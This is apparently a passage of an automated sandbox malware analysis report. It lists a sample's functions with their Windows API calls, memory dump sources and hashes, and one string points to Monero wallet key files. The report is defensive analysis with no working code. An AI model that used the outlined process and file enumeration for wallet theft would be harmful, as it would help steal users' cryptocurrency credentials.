                                    • Instruction Fuzzy Hash: D43184B6D00209ABDF04EFE4DC45AEFB3BABF59300F044619E901A7241E7349E44CBA6
                                    Function 00698810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006A05BF), ref: 0069885A
                                    • Process32First.KERNEL32(?,00000128), ref: 0069886E
                                    • Process32Next.KERNEL32(?,00000128), ref: 00698883
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • CloseHandle.KERNEL32(?), ref: 006988F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 973f26103569c15fff9a14443ca1527ebeedd64569de591c6085c7f5622df1ea
                                    • Instruction ID: 75a7102583267cac2bf676609a3b9d7fe23c347f16017354aa6bf0a974ce5b9d
                                    • Opcode Fuzzy Hash: 973f26103569c15fff9a14443ca1527ebeedd64569de591c6085c7f5622df1ea
                                    • Instruction Fuzzy Hash: 52315771905218ABCF64EB95DD51FEEB3BEEB05700F104299F10AA66A0DB306F44CFA5
                                    Function 006FFDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006FFE13
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006FFE2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Value___vcrt_
                                    • String ID:
                                    • API String ID: 1426506684-0
                                    • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction ID: ec6e2bca692a7eeb848f8b4fa89239fd9eeb89ba62fba08d495ba916e8e4c89e
                                    • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction Fuzzy Hash: CC017132109729FEF63527745CC9AB63A96EF017B57344339F226852F3EF964C429140
                                    Function 0069CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 0069CA7E
                                      • Part of subcall function 0069C2A0: __amsg_exit.LIBCMT ref: 0069C2B0
                                    • __getptd.LIBCMT ref: 0069CA95
                                    • __amsg_exit.LIBCMT ref: 0069CAA3
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0069CAC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: 31953eba1985a658e597141e744e41cfcf1e6d1973a9114aaf8b21eabccc1295
                                    • Instruction ID: 5a3e14fb0a04d80bd8260c7dbc127983171a7bd14c2ad2ad16657187f216aa0e
                                    • Opcode Fuzzy Hash: 31953eba1985a658e597141e744e41cfcf1e6d1973a9114aaf8b21eabccc1295
                                    • Instruction Fuzzy Hash: 24F0B4329443189BDFA0FBF8A80379E33ABAF41730F51114EF405A6ED2CB245E419B99
                                    Function 007004D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Catch
                                    • String ID: MOC$RCC
                                    • API String ID: 78271584-2084237596
                                    • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction ID: c057677caa6b4c0eeb4d2d0236bc3079cc21343676bedf441be97365510390ff
                                    • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction Fuzzy Hash: 43414B71900209EFDF15DF98DC81FAEBBB5BF48314F144259F904A6251D3399960DF90
                                    Function 007036CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: T8p
                                    • API String ID: 0-3547239097
                                    • Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                    • Instruction ID: 7c9be54063b6fd72ad54643f1dd1d62fbb6d30daf10c85345768823b73557268
                                    • Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                    • Instruction Fuzzy Hash: 41218BF2600205FBDB20AF618CC886AB7EDAF003647105719F925C72D1E779EE4087A0
                                    Function 00695190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00698F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 006951CA
                                    • lstrcat.KERNEL32(?,006A1058), ref: 006951E7
                                    • lstrcat.KERNEL32(?,01428F28), ref: 006951FB
                                    • lstrcat.KERNEL32(?,006A105C), ref: 0069520D
                                      • Part of subcall function 00694B60: wsprintfA.USER32 ref: 00694B7C
                                      • Part of subcall function 00694B60: FindFirstFileA.KERNEL32(?,?), ref: 00694B93
                                      • Part of subcall function 00694B60: StrCmpCA.SHLWAPI(?,006A0FC4), ref: 00694BC1
                                      • Part of subcall function 00694B60: StrCmpCA.SHLWAPI(?,006A0FC8), ref: 00694BD7
                                      • Part of subcall function 00694B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00694DCD
                                      • Part of subcall function 00694B60: FindClose.KERNEL32(000000FF), ref: 00694DE2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: 4f79168ce14c418f922d3daf1798d8758e0528d1816e69781b419a7492577055
                                    • Instruction ID: b96c356fba33ce422e3cad917837e92fb9c72325d68e39b42851386341f8497e
                                    • Opcode Fuzzy Hash: 4f79168ce14c418f922d3daf1798d8758e0528d1816e69781b419a7492577055
                                    • Instruction Fuzzy Hash: 922137B6904308ABCB94FBB0FC42EED733E9B95301F004648B65597495EE70ABC88F95